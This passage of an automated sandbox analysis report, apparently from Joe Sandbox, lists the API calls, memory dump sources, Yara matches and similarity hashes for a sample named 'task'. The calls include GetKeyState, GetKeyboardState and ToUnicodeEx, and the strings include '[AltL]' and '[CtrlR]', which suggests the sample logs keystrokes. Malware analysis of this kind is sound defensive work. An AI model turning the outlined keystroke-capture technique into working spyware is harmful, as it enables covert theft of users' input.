                                                                                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                APIs
                                                                                                                                                                • IsValidLocale.KERNEL32(00000000,5A,00000000,00000001,?,?,000A4135,?,?,?,?,00000004), ref: 000A5323
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LocaleValid
                                                                                                                                                                • String ID: 5A$IsValidLocaleName
                                                                                                                                                                • API String ID: 1901932003-1484227129
                                                                                                                                                                • Opcode ID: dd9981a13c5abab7d78f58ca94b02dab68ea7dc8df7206c2ea972330aad14a9b
                                                                                                                                                                • Instruction ID: aafba483bb55dd5274b4f0312468a107a78636033c4749522ea2cf0ddde5a393
                                                                                                                                                                • Opcode Fuzzy Hash: dd9981a13c5abab7d78f58ca94b02dab68ea7dc8df7206c2ea972330aad14a9b
                                                                                                                                                                • Instruction Fuzzy Hash: 7FF02E31A41A18B7EF206BA4DC06FDE7B95EF45B52F000115FD057A293CAB55D4055D4
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0006B1F2
                                                                                                                                                                  • Part of subcall function 00069F7D: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00069FB1
                                                                                                                                                                  • Part of subcall function 00069F7D: GetWindowThreadProcessId.USER32(00000000,?), ref: 00069FBC
                                                                                                                                                                  • Part of subcall function 00069F7D: GetKeyboardLayout.USER32(00000000), ref: 00069FC3
                                                                                                                                                                  • Part of subcall function 00069F7D: GetKeyState.USER32(00000010), ref: 00069FD0
                                                                                                                                                                  • Part of subcall function 00069F7D: GetKeyboardState.USER32(?), ref: 00069FDD
                                                                                                                                                                  • Part of subcall function 00069F7D: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00069FFB
                                                                                                                                                                  • Part of subcall function 00069F7D: ToUnicodeEx.USER32(?,?,?,00000010,00000000,?), ref: 0006A064
                                                                                                                                                                  • Part of subcall function 0006A1D3: SetEvent.KERNEL32(00000000,00000000,00000000,?,0006ADB1,00000000), ref: 0006A200
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                • String ID: [AltL]$[AltR]
                                                                                                                                                                • API String ID: 2738857842-2658077756
                                                                                                                                                                • Opcode ID: 00200f470b9ddf4b11f7b5ccb59fa8be9f4e6b68a93141257e4b749bfc558919
                                                                                                                                                                • Instruction ID: 4997ecd9cb97d365a8d09866d59e595559f8fb677a01ad68f21f851dcccc9121
                                                                                                                                                                • Opcode Fuzzy Hash: 00200f470b9ddf4b11f7b5ccb59fa8be9f4e6b68a93141257e4b749bfc558919
                                                                                                                                                                • Instruction Fuzzy Hash: 2BE0122134061116D8E8367D6D2BAFE39D39B93B60F80014DF942DFA97DE5A4E9143C3
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0006B24C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: State
                                                                                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                • API String ID: 1649606143-2446555240
                                                                                                                                                                • Opcode ID: 092b4f2937bbbec39274f9826d6fc9f78a2acdf35eb9792195f8dbd8679d99bf
                                                                                                                                                                • Instruction ID: 4ab1d0ea1e547b82aa5c91193800cf365f366f6f692e34f16ff57801adac8429
                                                                                                                                                                • Opcode Fuzzy Hash: 092b4f2937bbbec39274f9826d6fc9f78a2acdf35eb9792195f8dbd8679d99bf
                                                                                                                                                                • Instruction Fuzzy Hash: CBE0866130031152D8F43A3D5A6AAAD39D29B56761F40012CE482DF586DA5B498452C2
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(6FED41E0), ref: 6FE98C88
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: 8Bo$Ao
                                                                                                                                                                • API String ID: 3664257935-321205115
                                                                                                                                                                • Opcode ID: 3118f882052b765a1bf8ad8c6b5f495bbbf67441ca11e43bac81599d08569aba
                                                                                                                                                                • Instruction ID: 053f909465953ede0daaacbbfe7b6f3d2279035fc3e385747aab6d35a5e5a8aa
                                                                                                                                                                • Opcode Fuzzy Hash: 3118f882052b765a1bf8ad8c6b5f495bbbf67441ca11e43bac81599d08569aba
                                                                                                                                                                • Instruction Fuzzy Hash: F2E07D3280A21597D7200F08C0047C47FE86B1133AF71022BE4FC152F0D27269D2C693
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                • String ID: h%{
                                                                                                                                                                • API String ID: 3253501508-2527149017
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                • String ID: h%{
                                                                                                                                                                • API String ID: 3253501508-2527149017
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                • String ID: h%{
                                                                                                                                                                • API String ID: 3253501508-2527149017
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,00000001,00000000,?,?,00000100,6FEAEA54,6FEAEB80), ref: 6FE80172
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,6FE7AF6E), ref: 6FE80198
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,00000100,6FEAEA54,6FEAEB80), ref: 6FE801B2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE801FC
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE8024C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0